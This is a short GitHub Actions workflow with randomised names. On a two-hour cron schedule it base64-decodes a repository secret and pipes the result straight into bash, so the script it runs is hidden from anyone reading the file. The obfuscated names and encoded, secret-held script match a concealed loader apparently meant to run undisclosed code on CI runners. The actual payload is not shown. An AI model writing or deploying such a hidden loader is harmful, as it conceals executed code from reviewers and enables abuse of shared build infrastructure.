name: gINEboxvgVju
on:
  schedule:
    - cron: '0 */2 * * *'
  workflow_dispatch:
jobs:
  GzwqSa:
    runs-on: ubuntu-latest
    env:
      LTPLyJUiZKnF: ${{ secrets.XBjDsufZprR }}
    steps:
      - uses: actions/checkout@v5
      - run: echo "${{ secrets.xLipSuJYPKtQ }}" | base64 -d | bash
